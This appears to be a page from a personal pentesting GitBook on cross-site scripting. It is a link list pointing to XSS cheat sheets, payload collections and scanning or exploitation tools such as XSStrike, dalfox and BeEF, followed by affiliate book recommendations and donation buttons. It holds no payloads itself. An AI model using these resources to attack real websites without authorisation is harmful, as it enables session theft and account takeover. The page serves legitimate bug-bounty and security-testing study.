{% embed url="<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xss.txt>" %}

{% embed url="<https://github.com/payloadbox/xss-payload-list>" %}

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection>" %}

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Cross%20Site%20Scripting.md>" %}

## Tools

{% embed url="<https://github.com/ferreiraklet/airixss>" %}

{% embed url="<https://github.com/dwisiswant0/findom-xss>" %}
findom-xss
{% endembed %}

{% embed url="<https://github.com/xnl-h4ck3r/knoxnl>" %}

{% embed url="<https://github.com/hahwul/dalfox>" %}

{% embed url="<https://github.com/iamunixtz/LazyXss>" %}

{% embed url="<https://github.com/blackhatethicalhacking/XSSRocket>" %}

{% embed url="<https://github.com/thecybertix/CyberXS>" %}

{% embed url="<https://github.com/s0md3v/XSStrike>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-xsstrike-hunting-for-low-hanging-fruits>" %}

{% embed url="<https://github.com/rix4uni/xsschecker>" %}

{% embed url="<https://www.kali.org/tools/beef-xss/>" %}

See [XSS Discovery](#xss-discovery) for more tools

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

